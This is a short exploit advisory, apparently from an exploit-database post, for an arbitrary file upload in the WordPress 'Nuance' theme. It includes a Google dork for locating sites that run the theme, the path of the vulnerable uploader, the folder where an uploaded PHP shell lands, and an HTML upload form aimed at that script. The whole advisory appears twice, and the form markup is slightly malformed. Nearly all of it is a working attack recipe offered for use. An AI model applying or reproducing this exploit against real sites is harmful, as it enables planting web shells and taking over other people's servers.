# Wordpress Themes Nuance Shell Upload Vulnerability |
# Author : Berandal
# Google Dork: inurl:/wp-content/themes/nuance/
# Tested on: Win 7, Linux
#################################################################################
+-+-+-+-+-+-+-+-+
|M|e|H|C|e|N
+-+-+-+-+-+-+-+-+
# [!] Exploit : http://127.0.0.1/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php
# [!] File ******** : http://127.0.0.1/wp-content/uploads/[year]/[month]/filename.php
#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="Upload" />
</form>
</body>
</html>
#################################################################################
# Author : Berandal
# Google Dork: inurl:/wp-content/themes/nuance/
# Tested on: Win 7, Linux
#################################################################################
+-+-+-+-+-+-+-+-+
|M|e|H|C|e|N
+-+-+-+-+-+-+-+-+
# [!] Exploit : http://127.0.0.1/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php
# [!] File ******** : http://127.0.0.1/wp-content/uploads/[year]/[month]/filename.php
#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="qqfile" type="file" /><br />
<input type="submit" value="Upload" />
</form>
</body>
</html>
#################################################################################


